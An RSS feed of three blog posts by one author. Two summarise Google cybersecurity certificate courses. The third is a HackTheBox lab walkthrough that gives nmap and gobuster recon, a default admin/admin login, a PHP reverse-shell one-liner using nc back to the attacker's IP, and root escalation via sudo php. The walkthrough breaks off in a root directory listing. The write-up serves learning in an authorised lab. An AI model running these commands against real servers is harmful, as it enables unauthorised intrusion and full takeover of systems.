<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: CyberZeal</title>
    <description>The latest articles on DEV Community by CyberZeal (@cyber_zeal).</description>
    <link>https://dev.to/cyber_zeal</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1544409%2F8f43faf8-d1a6-4c78-b447-fc60b29c573e.jpg</url>
      <title>DEV Community: CyberZeal</title>
      <link>https://dev.to/cyber_zeal</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/cyber_zeal"/>
    <language>en</language>
    <item>
      <title>What Googlers can teach you about Security part 2</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Tue, 25 Jun 2024 17:40:10 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-part-2-1ko1</link>
      <guid>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-part-2-1ko1</guid>
      <description>&lt;p&gt;[TL;DR, I'm a Web Dev and I don't care about Cybersec] - go and read Open Worldwide Application Security Project (OWASP) &lt;a href="https://owasp.org/www-project-top-ten/"&gt;Top 10 Web Application Security Risks&lt;/a&gt; you &lt;strong&gt;must&lt;/strong&gt; know this stuff, if your web app runs on anything else than &lt;a href="http://127.0.0.1"&gt;http://127.0.0.1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Previously I wrote about Google's Cybersecurity Professional program and why I enrolled into it. If you haven't already, go and read it &lt;a href="https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;If you've already read it - we continue with the second course in the series - "Play It Safe: Manage Security Risks"&lt;/p&gt;

&lt;p&gt;Again, I only focus on some of the key points, course has a lots of content and hands on exercises - if you are interested how Cybersecurity industry works, explained through real life examples from Google, you should definitely take the course. &lt;/p&gt;

&lt;p&gt;Even if you are developer and have no interest in working in Cybersec, this will give you a better picture of how your organization operates. &lt;/p&gt;

&lt;p&gt;And who knows, maybe along the way you fall in love with Cyber. ❤️ &lt;/p&gt;

&lt;h2&gt;
  
  
  Module 1
&lt;/h2&gt;

&lt;p&gt;First module goes in depth with CISSP’s eight security domains that were mentioned in the previous course/post. I will list them again because they show how vast is the Security industry. Also, you can see the Roles and some of the responsibilities associated with them. &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security and Risk Management&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Chief Information Security Officer (CISO), Risk Manager, Compliance Officer.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Develop security policies and procedures.&lt;/li&gt;
&lt;li&gt;Assess and manage risks.&lt;/li&gt;
&lt;li&gt;Ensure compliance with regulations and standards.&lt;/li&gt;
&lt;li&gt;Align security practices with organizational goals.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Asset Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Data Owners, System Administrators, Privacy Officers.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Manage information assets (data, hardware, software).&lt;/li&gt;
&lt;li&gt;Define access controls and ownership.&lt;/li&gt;
&lt;li&gt;Protect sensitive data and enforce privacy rules.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security architecture and engineering&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Security Architects, Systems Engineers.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Design secure systems and networks.&lt;/li&gt;
&lt;li&gt;Implement encryption, firewalls, and access controls.&lt;/li&gt;
&lt;li&gt;Evaluate security technologies.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Communication and Network Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Network Administrators, Security Analysts.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Secure network infrastructure (routers, switches).&lt;/li&gt;
&lt;li&gt;Implement VPNs, firewalls, and intrusion detection systems.&lt;/li&gt;
&lt;li&gt;Ensure secure data transmission.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Identity and Access Management (IAM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: IAM Managers, Access Control Administrators, System Administrators.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Manage user identities and access rights.&lt;/li&gt;
&lt;li&gt;Implement authentication and authorization mechanisms.&lt;/li&gt;
&lt;li&gt;Monitor user activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security Assessment and Testing&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Penetration Testers, Vulnerability Assessors.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Conduct security assessments (penetration testing, vulnerability scanning).&lt;/li&gt;
&lt;li&gt;Identify weaknesses and recommend improvements.&lt;/li&gt;
&lt;li&gt;Validate security controls.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security Operations&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Security Analysts, Incident Responders.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Monitor security events and incidents.&lt;/li&gt;
&lt;li&gt;Investigate breaches and coordinate responses.&lt;/li&gt;
&lt;li&gt;Manage security incidents and recovery.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Software Development Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Software Developers, Security Champions.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Write secure code.&lt;/li&gt;
&lt;li&gt;Perform code reviews for vulnerabilities.&lt;/li&gt;
&lt;li&gt;Ensure software remains free of flaws.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Risk management
&lt;/h3&gt;

&lt;p&gt;You must keep your assets secure! Assets can be digital or physical - personal information of customers, trade secrets, servers, confidential documents… &lt;/p&gt;

&lt;p&gt;The &lt;a href="https://csrc.nist.gov/projects/risk-management/about-rmf"&gt;&lt;strong&gt;NIST Risk Management Framework (RMF)&lt;/strong&gt;&lt;/a&gt; is a comprehensive, flexible, and repeatable 7-step process that organizations can use to manage information security and privacy risk. &lt;/p&gt;

&lt;p&gt;The 7 steps are:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Prepare&lt;/strong&gt;: Talk to key stakeholders, prepare a broad risk management strategy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Categorize&lt;/strong&gt;: Analyze the system, categorize the data, and do an impact analysis.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Select&lt;/strong&gt;: Choose NIST SP 800-53 controls based on risk assessment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Implement&lt;/strong&gt;: Deploy controls and document their deployment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assess&lt;/strong&gt;: Verify control effectiveness.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Authorize&lt;/strong&gt;: Senior management authorizes the whole thing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor&lt;/strong&gt;: Continuously monitor control implementation and risks.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can see list of cybersecurity risks &lt;a href="https://www.nist.gov/itl/smallbusinesscyber/cybersecurity-basics/cybersecurity-risks"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;Also there is a famous &lt;a href="https://owasp.org/www-project-top-ten/"&gt;OWASP top 10 security risks&lt;/a&gt; for web applications. &lt;strong&gt;&lt;u&gt;If you are a web dev you should really really get acquainted with this list.&lt;/u&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can see how the top list changes through time. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a4sd79so8dh7zq2yp75.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a4sd79so8dh7zq2yp75.png" alt="OWASP Top 10 Risks" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Image credit Google Cybersecurity Professional Program&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Module 2
&lt;/h2&gt;

&lt;p&gt;We already mentioned CIA in previous post, but it’s so crucial that we will expand a bit here. The way I see it is whatever assessment you do in security, be it Application Threat Modeling or Infrastructure Security Review or Risk Assessment you are thinking about these three things:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Confidentiality&lt;/strong&gt; - Who can access what? We need to ensure only authorized users can access specific parts of the system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Integrity&lt;/strong&gt; - No one should tamper with your system. And if someone does you should know about it. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Availability&lt;/strong&gt; - Systems should be available to the authorized users. &lt;/p&gt;

&lt;p&gt;Rest of the module goes in depth with OWASP and NIST CyberSecurity Framework. Also first hand on exercise is here - you conduct a security audit of a fictional small company that had a recent increase in business. It really well made and you see how everything you learned so far is applied in the real world. &lt;/p&gt;

&lt;h2&gt;
  
  
  Module 3
&lt;/h2&gt;

&lt;p&gt;This module goes in depth on Security Information and Event Management (SIEM) tools. SIEM tools aggregate all event streams in the organization, like network logs, app logs and so on. And if something weird starts happening they sound the alert. &lt;/p&gt;

&lt;p&gt;A picture is worth a thousand words, and video is.. thousand words per frame, I guess... So you can go and check IBM’s 4min &lt;a href="https://www.youtube.com/watch?v=9RfsRn7m7OE"&gt;video&lt;/a&gt; about this, if you are interested. Or do a web search on Splunk to see how the most popular SIEM solution looks like. &lt;/p&gt;

&lt;p&gt;There is also a thing called &lt;strong&gt;Security orchestration, automation, and response (SOAR)&lt;/strong&gt; which is considered to be a future of SIEM - or at least it can be used to automate some repetitive tasks generated by SIEMs. More about it &lt;a href="https://www.youtube.com/watch?v=k7ju95jDxFA"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Module 4
&lt;/h2&gt;

&lt;p&gt;So, your SIEM detected an intrusion, what do you do? Don’t panic, if you work in serious organization you have a Playbook. If you don’t have a Playbook? Well, than you can panic. 😅&lt;/p&gt;

&lt;p&gt;Last module is about Playbooks. But what is a Playbook you ask? &lt;/p&gt;

&lt;p&gt;A Playbook is a manual which tells you what exactly you need to do and with what tools in response to a security incident. &lt;/p&gt;

&lt;p&gt;Playbooks ensure a consistent list of actions is followed, regardless of who is handling the case.&lt;/p&gt;

&lt;p&gt;Different types of playbooks exist, including those for incident response, security alerts, team-specific, and product-specific purposes.&lt;/p&gt;

&lt;p&gt;Here, we'll focus on a commonly used cybersecurity playbook called an incident response playbook. Incident response involves quickly identifying an attack, containing damage, and correcting the effects of a breach. An incident response playbook includes six phases to help manage security incidents from start to finish. Now while I think theory has it’s place, these type of things are best explained using real world examples. Here is how each step would look like for some concrete scenario:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;📝 &lt;strong&gt;Preparation&lt;/strong&gt;: An organization creates an incident response plan that outlines specific procedures for different types of incidents (e.g., data breaches, DDoS attacks, malware outbreaks). They identify key personnel responsible for incident response, establish communication channels, and conduct regular tabletop exercises to ensure everyone knows their roles.&lt;/li&gt;
&lt;li&gt;🔍 &lt;strong&gt;Detection and Analysis&lt;/strong&gt;: A security operations center (SOC) detects unusual network traffic patterns indicating a potential intrusion. Analysts investigate the incident, analyze logs, and use threat intelligence feeds to determine if the activity is malicious. They identify the affected systems and assess the impact.&lt;/li&gt;
&lt;li&gt;🔒 &lt;strong&gt;Containment&lt;/strong&gt;: Upon confirming a data breach, the incident response team isolates compromised servers from the network to prevent further spread. They disable compromised user accounts and block malicious IP addresses. The goal is to limit the attacker’s access and prevent additional damage.&lt;/li&gt;
&lt;li&gt;👊 &lt;strong&gt;Eradication and Recovery&lt;/strong&gt;: After identifying a ransomware attack, the organization removes the malware from affected systems. They restore data from backups and patch vulnerabilities that allowed the initial infection. The recovery process involves verifying system integrity and ensuring all services are operational.&lt;/li&gt;
&lt;li&gt;☕ &lt;strong&gt;Post-Incident Activity&lt;/strong&gt;: The incident response team conducts a postmortem analysis of a successful phishing attack. They document the attack vector, identify gaps in security controls, and recommend improvements. Leadership reviews the findings, and the organization updates its security policies and provides additional user training.&lt;/li&gt;
&lt;li&gt;☎️ &lt;strong&gt;Coordination&lt;/strong&gt;: This involves reporting incidents and sharing information throughout the response process based on established standards. Coordination ensures compliance requirements are met and allows for a coordinated response and resolution.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Again, there were a lots of other things, but you can get the idea. Feel free to ping me in the comments.&lt;/p&gt;

&lt;p&gt;Stay safe! &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>certification</category>
      <category>google</category>
    </item>
    <item>
      <title>What Googlers can teach you about Security</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Wed, 19 Jun 2024 15:13:13 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m</link>
      <guid>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m</guid>
      <description>&lt;p&gt;TL;DR: just go watch &lt;a href="https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H"&gt;Hacking Google&lt;/a&gt;. Google made few superbly produced episodes about times they got hacked. &lt;/p&gt;

&lt;p&gt;Curious about what Googlers can teach you about Cyber Security? Then read on!&lt;/p&gt;

&lt;p&gt;Some time ago I stepped into a Security role in my company, after almost 10 years of working as a developer. How and why that happened will be explained in another blog post, for now only thing that you need to know is that I’m something between Security Manager and Security Engineer for this huge product that has 100+ people spanning over multiple teams. &lt;/p&gt;

&lt;p&gt;Now, I had some Security bootcamp, and then internal Security training lasting almost one and a half year. For some reason I was thinking that, plus picking things up as I go, would be enough, but boy was I wrong. Every few weeks we were spending a week covering a completely different topic, and this program was tailored to my company specific needs (which are very broad given that this is a 100k+ employees software company) &lt;/p&gt;

&lt;p&gt;As a geek and fan of structured learning I started exploring what are my options. I found out that some college type education wont get you far in cybersecurity, which makes sense given that this industry is sooo fast. I mean, software engineering is fast, but if you have time and money you should go to college - learning your CS stuff will do wonders for you. But Cyber is crazily fast and as I see it (and I’m not the only one) is that Cyber security college has no real value, IF you have former tech education. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;So, if you want structured learning in CyberSec, certificates are the way.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpehf2r0vwnu6r3p1vzl2.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpehf2r0vwnu6r3p1vzl2.gif" alt="Image description" width="498" height="280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are famous and advanced ones as &lt;a href="https://www.offsec.com"&gt;OffSec&lt;/a&gt; and &lt;a href="https://www.sans.org/emea/"&gt;SANS&lt;/a&gt; but I wanted something that gives me an overview of the field and isn’t too pricey. &lt;/p&gt;

&lt;p&gt;I concluded that Google’s Cybersecurity Professional Certificate Program was the best deal, as you can get it on Coursera, and it covers topics that CompTIA Security+ covers. You also get an voucher for 30% discount for Security+, and all that for Coursera monthly sub price. &lt;/p&gt;

&lt;p&gt;You can also audit course, so you can later get back for the paid exercise and that way you can go through all the eight courses in a month. &lt;br&gt;
Not sure is this a sleazeball move, especially since you can apply for financial aid on Coursera. As for me, in the end I paid for the annual sub, as I want to take some other courses too. &lt;/p&gt;

&lt;p&gt;Ok, so Google Cybersecurity Professional Certificate Program consists of 8 courses, and it’s intention is to make you ready for entry level Security position, and give you an overview of Cyber Sec industry. &lt;/p&gt;

&lt;p&gt;Let me tell you what is the first course (Foundations of Cybersecurity) about, and in the later blog posts I will cover the remaining 7.&lt;/p&gt;

&lt;p&gt;Also, one &lt;strong&gt;disclaimer&lt;/strong&gt;: I will give only the most interesting points to me. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 1
&lt;/h4&gt;

&lt;p&gt;This module is essentially getting you hyped for Cyber Sec. Production of the whole program is great btw, wouldn’t expect less from Google. You get to hear from Google’s sec experts what are they doing at Google, what would be your responsibilities as a entry level sec analyst, and you get introduced to terminology. Also Google’s employees talk about their journey to Google, which is also very interesting. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 2
&lt;/h4&gt;

&lt;p&gt;This module is about historical background, types of attacks that can happen and understanding attackers. Here are the types of attackers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Advanced Persistent Threats (APTs):&lt;/strong&gt;  Usually state funded. Highly skilled and patient, APTs meticulously research targets (think big corporations or government agencies) and can remain undetected for long periods, aiming to steal valuable data or disrupt critical infrastructure.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Insider Threats:&lt;/strong&gt; Insider threats are authorized users who misuse their access to steal data, sabotage systems, or commit espionage.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hacktivists:&lt;/strong&gt; These are the digital activists who use hacking to promote their cause. Their targets may be governments or corporations, and their goals range from raising awareness to social change campaigns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ethical or White Hat Hackers (Authorized Hackers):&lt;/strong&gt; Ethical hackers use their skills legally to identify vulnerabilities in systems and help organizations improve their security posture.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Researchers or Grey Hat (Semi-Authorized Hackers):&lt;/strong&gt; These guys discover weaknesses but don't exploit them. They responsibly report their findings to help improve overall security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unethical or Black Hat Hackers (Unauthorized Hackers):&lt;/strong&gt; Bad guys. Motivated by financial gain or simply causing trouble, they exploit vulnerabilities to steal data or disrupt systems.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Also this module introduces the CISSP 8 Security Domains:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Security and risk management&lt;/strong&gt; - focuses on defining security goals and objectives, risk mitigation, compliance, business continuity, and the law. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Asset security&lt;/strong&gt; - focuses on securing digital and physical assets. It's also related to the storage, maintenance, retention, and destruction of data. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security architecture and engineering&lt;/strong&gt; - focuses on optimizing data security by ensuring effective tools, systems, and processes are in place. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Communication and network security&lt;/strong&gt; - focuses on managing and securing physical networks and wireless communications.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Identity and access management&lt;/strong&gt;- focuses on keeping data secure, by ensuring users follow established policies to control and manage physical assets, like office spaces, and logical assets, such as networks and applications. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security assessment and testing&lt;/strong&gt; - focuses on conducting security control testing, collecting and analyzing data, and conducting security audits to monitor for risks, threats, and vulnerabilities. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security operations&lt;/strong&gt; - focuses on conducting investigations and implementing preventative measures.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Software development security&lt;/strong&gt; - focuses on using secure coding practices, which are a set of recommended guidelines that are used to create secure applications and services. &lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Module 3
&lt;/h4&gt;

&lt;p&gt;This one is about frameworks. Funny story, I often heard Security guys mentioning CIA, and I was like “I’m pretty sure they are not talking about &lt;em&gt;that&lt;/em&gt; CIA”. Well here I learned that CIA stands for  &lt;strong&gt;Confidentiality, Integrity, and Availability&lt;/strong&gt; which is foundational model for Cyber Security. &lt;/p&gt;

&lt;p&gt;There are various frameworks but you may have heard about &lt;a href="https://www.nist.gov/cyberframework"&gt;NIST Cybersecurity Framework&lt;/a&gt;. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 4
&lt;/h4&gt;

&lt;p&gt;This module is about tools that cybersecurity people use: &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security information and event management (SIEM)&lt;/strong&gt; - application that collects and analyzes log data to monitor critical activities in an organization.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network protocol analyzers (packet sniffers)&lt;/strong&gt; - &lt;strong&gt;network protocol analyzer&lt;/strong&gt;, also known as a &lt;strong&gt;packet sniffer&lt;/strong&gt;, is a tool designed to capture and analyze data traffic in a network. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Playbooks&lt;/strong&gt; - playbook is a manual that provides details about any operational action, such as how to respond to a security incident. &lt;/p&gt;

&lt;p&gt;And others which weren’t anything new to me were mentioned: Linux, SQL, Python.&lt;/p&gt;

&lt;p&gt;There were &lt;strong&gt;a lots of other stuff&lt;/strong&gt; but these were the things most interesting to me. &lt;br&gt;
Stay tuned for next Course in the Program: &lt;strong&gt;&lt;em&gt;Play It Safe: Manage Security Risks&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Also, if you have any questions about the program, feel free to ping me in the comments. &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>certification</category>
      <category>google</category>
    </item>
    <item>
      <title>Hacking a Server in Three Acts</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Thu, 30 May 2024 13:24:49 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/hacking-a-server-in-three-acts-31m2</link>
      <guid>https://dev.to/cyber_zeal/hacking-a-server-in-three-acts-31m2</guid>
      <description>&lt;p&gt;So, I got on this path of Cybersecurity after 10 years of working in industry as a Full Stack Java Developer. How and why that happened will be covered in another blog post. For our story today, only thing that you need to know is that at some point in my journey of learning about Security, I stumbled upon HackTheBox platform. &lt;/p&gt;

&lt;p&gt;HTB Platform is about teaching you to hack into servers (boxes). And, man, not just that their content is superb, but the design and UX is so amazing... Long story short, I got hooked up, and started with the first course &lt;code&gt;Cracking Into HTB&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;They show you various techniques and stuff, and in the end you get an IP of a box that you need to hack into applying all that you learned. You also get your VM running Linux ParrotSec - a distro preloaded with tools for hacking/pentesting. It was super thrilling, and here is how it went: &lt;/p&gt;

&lt;h2&gt;
  
  
  Act I: Reconnaissance
&lt;/h2&gt;

&lt;p&gt;First we need to see what's going on with the server, what ports are open and what OS and other software is running there. I wrote down IPs of target and my VM because they will be used often. I ran &lt;code&gt;nmap &amp;lt;TARGET_IP&amp;gt;&lt;/code&gt; which performed a quick scan of most common ports. It returned 80 and 443, default ports for http and https. &lt;/p&gt;

&lt;p&gt;Now I ran full port scan with version scan and scripts which try to obtain more detailed info. You get all this just by running &lt;code&gt;nmap -sV -sC -p- &amp;lt;TARGET_IP&amp;gt;&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;While &lt;code&gt;nmap&lt;/code&gt; is running (full scan takes some time) I open target IP in browser. I see that Get Simple CMS is running there. Immediately I google GetSimple CMS vulnerabilities. Of course there is one high issue - Remote Code Execution. &lt;/p&gt;

&lt;p&gt;I continue with &lt;code&gt;Gobuster&lt;/code&gt; which will show me what folders there are on the server: &lt;code&gt;gobuster dir -u &amp;lt;TARGET_IP&amp;gt; -w ./wordlists/common.txt&lt;/code&gt; &lt;/p&gt;

&lt;p&gt;Well &lt;code&gt;Gobuster&lt;/code&gt; showed me that there are some folders, most interesting of them being &lt;code&gt;/admin&lt;/code&gt; folder (should have checked this even before I ran gobuster). So, I go to &lt;code&gt;&amp;lt;TARGET_IP&amp;gt;/admin&lt;/code&gt; and I get login screen. Now you don't need to be a hacker to enter admin/admin when you see a login screen somewhere. &lt;/p&gt;

&lt;p&gt;And interestingly enough, one of the instructors in Cybersecurity training in my company told me that one of the boxes on the (in)famous &lt;a href="https://www.offsec.com/courses/pen-200/" rel="noopener noreferrer"&gt;OSCP certification&lt;/a&gt; exam had this vulnerability. So, believe it or not, I got into the admin panel by using admin/admin credentials. Now we still don't have access to the server, but we are awfully close.&lt;/p&gt;

&lt;h2&gt;
  
  
  Act II: The Walls Have Been Breached
&lt;/h2&gt;

&lt;p&gt;Now, I get back to the vulnerability that I googled. I see it's for version &lt;code&gt;3.3.16&lt;/code&gt; and I check to see which one we have - it's &lt;code&gt;3.3.15&lt;/code&gt; so hopefully we are good. I guess I could run the Metasploit here and get into the box using this vulnerability, but that feels like cheating. &lt;/p&gt;

&lt;p&gt;At the first look the vulnerability is not straightforward so I get back to see what we have on the admin panel. There is a edit theme page which lets you include PHP files. I check where are those files loaded from. I go through &lt;code&gt;/backup&lt;/code&gt; and &lt;code&gt;/data&lt;/code&gt; folders that &lt;code&gt;Gobuster&lt;/code&gt; found, and see some things that would help me to get the username and pass of admin, which I already guessed. There is an API key which may come in useful. (Later I found out that this would be used for authentication through Metasploit if I didn't get the access to the admin portal).  &lt;/p&gt;

&lt;p&gt;By this time full &lt;code&gt;nmap&lt;/code&gt; scan has finished, I see that server uses &lt;code&gt;OpenSSH 8.2p1&lt;/code&gt; which has some vulnerabilities. But GetSimpleCMS is the elephant in the room here.&lt;/p&gt;

&lt;p&gt;I go around the admin panel, there is an upload file button, but it’s not working. I google the issue and it’s not working because flash is not enabled. I get back to the edit theme and start to fiddle with it. I realize immediately that I’m retarded and that I can just write code here directly. Now it’s easy-peasy. At the end of the file, I just write:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc &amp;lt;MY_IP&amp;gt; 9443 &amp;gt;/tmp/f");?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and, voila, I have a reverse shell. Of course, I need to run &lt;code&gt;netcat&lt;/code&gt; to listen to this connection that will be opened: &lt;code&gt;nc -lvnp 9443&lt;/code&gt;, and &lt;code&gt;curl&lt;/code&gt; or just open the page that has the reverse shell code in it. &lt;/p&gt;

&lt;p&gt;We are in! But for our victory to be complete, we need root access. Next step: Privilege escalation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Act III: All Your Base Are Belong To Us
&lt;/h2&gt;

&lt;p&gt;Let's first upgrade the shell a bit because in current state it doesn't have all the nice features we are used to. There are &lt;a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" rel="noopener noreferrer"&gt;multiple ways&lt;/a&gt; to do this but I did it this way: &lt;br&gt;
&lt;code&gt;python3 -c 'import pty; pty.spawn("/bin/bash")'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now, I have full blown shell and I'm browsing around the file system to see is there anything interesting that can be used for privilege escalation. I also find the first flag. &lt;/p&gt;

&lt;p&gt;I'm thinking of running the &lt;code&gt;LinPEAS&lt;/code&gt;, but let's first see what sudo privileges I have - &lt;code&gt;sudo -l -U &amp;lt;username&amp;gt;&lt;/code&gt;. Bingo! I see: &lt;br&gt;
&lt;code&gt;(ALL : ALL) NOPASSWD: /usr/bin/php&lt;/code&gt; which means I can execute PHP binary as root without password. And you know what that means.. &lt;/p&gt;

&lt;p&gt;I go and have a quick chat with chatGPT. Essentially you have numerous options here, but I go with interactive shell, because why not take everything life is giving to you.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo /usr/bin/php -a

php &amp;gt; chdir('/root');

chdir('/root');

php &amp;gt; print_r(scandir('.'));

print_r(scandir('.'));

Array
(
[0] =&amp;gt; .
[1] =&amp;gt; ..
[2] =&amp;gt; .bash_history
[3] =&amp;gt; .bashrc
